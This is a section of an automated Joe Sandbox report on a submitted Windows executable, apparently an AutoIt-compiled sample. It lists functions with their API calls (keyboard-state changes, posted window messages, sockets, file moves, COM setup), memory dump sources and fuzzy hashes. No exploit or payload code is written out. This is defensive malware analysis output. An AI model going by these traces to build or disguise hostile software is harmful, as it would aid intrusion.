                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DE13C4
                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DE1430
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ArraySafe$Data$Access$UnaccessVartype
                                              • String ID:
                                              • API String ID: 2550207440-0
                                              • Opcode ID: fdfb7cd86cc30ee8e31fa03bc8fb24d632ec10a68a07fc9ba734f79c0311b854
                                              • Instruction ID: fb41e5a6223ef13a90ecab7c62dea919d777be1bdc5fc303ffafa80a47b7982e
                                              • Opcode Fuzzy Hash: fdfb7cd86cc30ee8e31fa03bc8fb24d632ec10a68a07fc9ba734f79c0311b854
                                              • Instruction Fuzzy Hash: FB91E279A00248AFDB00EFA6C885BBE77B5FF45314F244029EA50E7291D774E945CBB0
                                              Function 00D8948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ObjectSelect$BeginCreatePath
                                              • String ID:
                                              • API String ID: 3225163088-0
                                              • Opcode ID: f3762a85812f57853bb1080cd3a03424452ab51c435c5c81895ee937592d5876
                                              • Instruction ID: 32ed678badc8811f17c257c17d85e92163e93d0d4146413927ca076f03e59c94
                                              • Opcode Fuzzy Hash: f3762a85812f57853bb1080cd3a03424452ab51c435c5c81895ee937592d5876
                                              • Instruction Fuzzy Hash: 35911571900219EFCB10DFA9C884AEEBBB8FF49320F188599E555B7251D375AA42CF70
                                              Function 00DF3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                              Download Yara Rule
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00DF396B
                                              • CharUpperBuffW.USER32(?,?), ref: 00DF3A7A
                                              • _wcslen.LIBCMT ref: 00DF3A8A
                                              • VariantClear.OLEAUT32(?), ref: 00DF3C1F
                                                • Part of subcall function 00DE0CDF: VariantInit.OLEAUT32(00000000), ref: 00DE0D1F
                                                • Part of subcall function 00DE0CDF: VariantCopy.OLEAUT32(?,?), ref: 00DE0D28
                                                • Part of subcall function 00DE0CDF: VariantClear.OLEAUT32(?), ref: 00DE0D34
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                              • API String ID: 4137639002-1221869570
                                              • Opcode ID: 72c4ad530d183326566fff6da39db96386b183b54a3f2f9c8088a7228f21767e
                                              • Instruction ID: de8ea43b85244608e44c6652fbda800273e97ca4b445817e32d0c1e869e7069a
                                              • Opcode Fuzzy Hash: 72c4ad530d183326566fff6da39db96386b183b54a3f2f9c8088a7228f21767e
                                              • Instruction Fuzzy Hash: 699169756083059FC704EF28C49196AB7E4FF88314F15892EF98A9B351DB31EE45CBA2
                                              Function 00DF4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00DD000E: CLSIDFromProgID.COMBASE ref: 00DD002B
                                                • Part of subcall function 00DD000E: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00DD0046
                                                • Part of subcall function 00DD000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DCFF41,80070057,?,?), ref: 00DD0054
                                                • Part of subcall function 00DD000E: CoTaskMemFree.COMBASE(00000000), ref: 00DD0064
                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00DF4C51
                                              • _wcslen.LIBCMT ref: 00DF4D59
                                              • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,?), ref: 00DF4DCF
                                              • CoTaskMemFree.COMBASE(?), ref: 00DF4DDA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                              • String ID: NULL Pointer assignment
                                              • API String ID: 614568839-2785691316
                                              • Opcode ID: 51280c128d47a96d9da74131a95f018df96e55369a205c2cea1cec7bd3e28c51
                                              • Instruction ID: e8528cb21ab80507158c6ef8a217a8e7d67cd92f8aa8bb382e5dffcd60f895e9
                                              • Opcode Fuzzy Hash: 51280c128d47a96d9da74131a95f018df96e55369a205c2cea1cec7bd3e28c51
                                              • Instruction Fuzzy Hash: C791F571D0021DAFDF14DFA4C891AEEB7B8FF48314F11816AE919A7251EB309A458FB0
                                              Function 00E020FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetMenu.USER32(?), ref: 00E02183
                                              • GetMenuItemCount.USER32(00000000), ref: 00E021B5
                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E021DD
                                              • _wcslen.LIBCMT ref: 00E02213
                                              • GetMenuItemID.USER32(?,?), ref: 00E0224D
                                              • GetSubMenu.USER32(?,?), ref: 00E0225B
                                                • Part of subcall function 00DD3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD3A57
                                                • Part of subcall function 00DD3A3D: GetCurrentThreadId.KERNEL32 ref: 00DD3A5E
                                                • Part of subcall function 00DD3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DD25B3), ref: 00DD3A65
                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E022E3
                                                • Part of subcall function 00DDE97B: Sleep.KERNEL32 ref: 00DDE9F3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                              • String ID:
                                              • API String ID: 4196846111-0
                                              • Opcode ID: 4553eca0c9218c19ceda695e6746d8bdab931b2ca429d786f7309d2d3abd1cc8
                                              • Instruction ID: eaa34b890851000a847cce185857bd07e98abf031d49fdda1491c025571ee684
                                              • Opcode Fuzzy Hash: 4553eca0c9218c19ceda695e6746d8bdab931b2ca429d786f7309d2d3abd1cc8
                                              • Instruction Fuzzy Hash: 1071A135A00205AFCB10EFA4C845AAEB7F5EF88314F10945DE916FB391D735ED818BA0
                                              Function 00DDAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetParent.USER32(?), ref: 00DDAEF9
                                              • GetKeyboardState.USER32(?), ref: 00DDAF0E
                                              • SetKeyboardState.USER32(?), ref: 00DDAF6F
                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00DDAF9D
                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00DDAFBC
                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00DDAFFD
                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00DDB020
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: 2e2d39e64a357eac1ec63e3e6e8014ad5eff325b8a879db63452d850105312ff
                                              • Instruction ID: 8648241d11b4d7c10ba7c3f9a3aacd9945cd506f3e3c93e6629acc857e64d216
                                              • Opcode Fuzzy Hash: 2e2d39e64a357eac1ec63e3e6e8014ad5eff325b8a879db63452d850105312ff
                                              • Instruction Fuzzy Hash: 1451E0A16046D17DFB3643388845BBBBEA99F06318F0C858BF1D9559C2C399ACC8D771
                                              Function 00DDACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetParent.USER32(00000000), ref: 00DDAD19
                                              • GetKeyboardState.USER32(?), ref: 00DDAD2E
                                              • SetKeyboardState.USER32(?), ref: 00DDAD8F
                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00DDADBB
                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00DDADD8
                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00DDAE17
                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00DDAE38
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: 25a7caae09b63c7b6ae283e4659211910fed291a1ebe235fadbe46442f2e1f91
                                              • Instruction ID: 7303c175255fd97a745f3cccaa13961c6d3432e8f80318fb1f57e6fb2503a868
                                              • Opcode Fuzzy Hash: 25a7caae09b63c7b6ae283e4659211910fed291a1ebe235fadbe46442f2e1f91
                                              • Instruction Fuzzy Hash: 1D5104A16047D53DFB3283388C45B7ABFA99B46300F0CC58AF1D556AC2D295EC88E772
                                              Function 00DA542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetConsoleCP.KERNEL32(00DB3CD6,?,?,?,?,?,?,?,?,00DA5BA3,?,?,00DB3CD6,?,?), ref: 00DA5470
                                              • __fassign.LIBCMT ref: 00DA54EB
                                              • __fassign.LIBCMT ref: 00DA5506
                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00DB3CD6,00000005,00000000,00000000), ref: 00DA552C
                                              • WriteFile.KERNEL32(?,00DB3CD6,00000000,00DA5BA3,00000000,?,?,?,?,?,?,?,?,?,00DA5BA3,?), ref: 00DA554B
                                              • WriteFile.KERNEL32(?,?,00000001,00DA5BA3,00000000,?,?,?,?,?,?,?,?,?,00DA5BA3,?), ref: 00DA5584
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                              • String ID:
                                              • API String ID: 1324828854-0
                                              • Opcode ID: d3cb20b381c203f283ef61a5276a04a53a10cbdbd78700fe064c0c4d39a7b481
                                              • Instruction ID: d3c5b2cf92df5acf89b4e2f1ab15caa632424531833e0984c9a6d0af2a1321ca
                                              • Opcode Fuzzy Hash: d3cb20b381c203f283ef61a5276a04a53a10cbdbd78700fe064c0c4d39a7b481
                                              • Instruction Fuzzy Hash: 2651B170E006499FDB10CFA9E845AEEBBF9EF0A300F14416AF955E7295D730DA45CB60
                                              Function 00D92D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                              Download Yara Rule
                                              APIs
                                              • _ValidateLocalCookies.LIBCMT ref: 00D92D4B
                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00D92D53
                                              • _ValidateLocalCookies.LIBCMT ref: 00D92DE1
                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00D92E0C
                                              • _ValidateLocalCookies.LIBCMT ref: 00D92E61
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                              • String ID: csm
                                              • API String ID: 1170836740-1018135373
                                              • Opcode ID: 8164f4979820447c13f78f765578bf05d15e5e67f89df57534781dd0e25d6771
                                              • Instruction ID: e4e072498c4f67f4af0485ae6ee9b5a046c878a4217837fd54257358921a3985
                                              • Opcode Fuzzy Hash: 8164f4979820447c13f78f765578bf05d15e5e67f89df57534781dd0e25d6771
                                              • Instruction Fuzzy Hash: 7A418034A01209ABCF14DF68C885AAEBBB5FF44324F188155E814AB292D731EE45CBF0
                                              Function 00DF10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00DF304E: inet_addr.WS2_32(?), ref: 00DF307A
                                                • Part of subcall function 00DF304E: _wcslen.LIBCMT ref: 00DF309B
                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00DF1112
                                              • WSAGetLastError.WS2_32 ref: 00DF1121
                                              • WSAGetLastError.WS2_32 ref: 00DF11C9
                                              • closesocket.WS2_32(00000000), ref: 00DF11F9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                              • String ID:
                                              • API String ID: 2675159561-0
                                              • Opcode ID: e8fb1424540e6f90ef858634478bb69d72e6c5686ef62447ffde269b9157cf60
                                              • Instruction ID: a5ddcc3c301910ecf93028aad453ccf20a3c8ca84a350d17a2a078abf0768f00
                                              • Opcode Fuzzy Hash: e8fb1424540e6f90ef858634478bb69d72e6c5686ef62447ffde269b9157cf60
                                              • Instruction Fuzzy Hash: D041F435600208EFDB109F24C884BB9B7E9EF45324F19C159FA49AB291D771EE85CBB1
                                              Function 00DDCF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00DDDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DDCF22,?), ref: 00DDDDFD
                                                • Part of subcall function 00DDDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DDCF22,?), ref: 00DDDE16
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00DDCF45
                                              • MoveFileW.KERNEL32(?,?), ref: 00DDCF7F
                                              • _wcslen.LIBCMT ref: 00DDD005
                                              • _wcslen.LIBCMT ref: 00DDD01B
                                              • SHFileOperationW.SHELL32(?), ref: 00DDD061
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                              • String ID: \*.*
                                              • API String ID: 3164238972-1173974218
                                              • Opcode ID: fe82534a99333864c3be9133527f676df36e5984ea217d70a5e914dd18f69de1
                                              • Instruction ID: 0826e6634df309fe17c42ddde51ae9c19e562163fa0a9f8d3491133a4675db43
                                              • Opcode Fuzzy Hash: fe82534a99333864c3be9133527f676df36e5984ea217d70a5e914dd18f69de1
                                              • Instruction Fuzzy Hash: 0C4137719452195FDF12EFA4D981ADDB7B9EF48340F1400E7E549EB241EA34A688CB70
                                              Function 00E02DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E02E1C
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E02E4F
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E02E84
                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E02EB6
                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E02EE0
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E02EF1
                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E02F0B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LongWindow$MessageSend
                                              • String ID:
                                              • API String ID: 2178440468-0
                                              • Opcode ID: 1a60229d87ca944a9f43f1eb0ac29c6276dab344cfdc77d95596239151a3397c
                                              • Instruction ID: 46ff6692474d3c28108a8ac3a0aa1d78ae3a0f7b6fd6a65858ef093b29dc72e8
                                              • Opcode Fuzzy Hash: 1a60229d87ca944a9f43f1eb0ac29c6276dab344cfdc77d95596239151a3397c
                                              • Instruction Fuzzy Hash: CA3119346441419FDB22CF59DC88F6537E4EB8A754F1411A8FA04AB2F1CB72A886DB01
                                              Function 00DD7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD7769
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD778F
                                              • SysAllocString.OLEAUT32(00000000), ref: 00DD7792
                                              • SysAllocString.OLEAUT32(?), ref: 00DD77B0
                                              • SysFreeString.OLEAUT32(?), ref: 00DD77B9
                                              • StringFromGUID2.COMBASE(?,?,00000028), ref: 00DD77DE
                                              • SysAllocString.OLEAUT32(?), ref: 00DD77EC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: a87b973820963a80d32822a88ef1525853994e627603e720c603c47eefd96124
                                              • Instruction ID: ea5f54cf8da737455daa375d7cf56fefbb67aa7f92e09486142ea066cb4bc39f
                                              • Opcode Fuzzy Hash: a87b973820963a80d32822a88ef1525853994e627603e720c603c47eefd96124
                                              • Instruction Fuzzy Hash: D421B276604219BFDB10EFA9CC88CBB73ACFB093647148566FA14DB290E670DC8587B0
                                              Function 00DD77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                              Download Yara Rule
                                              APIs
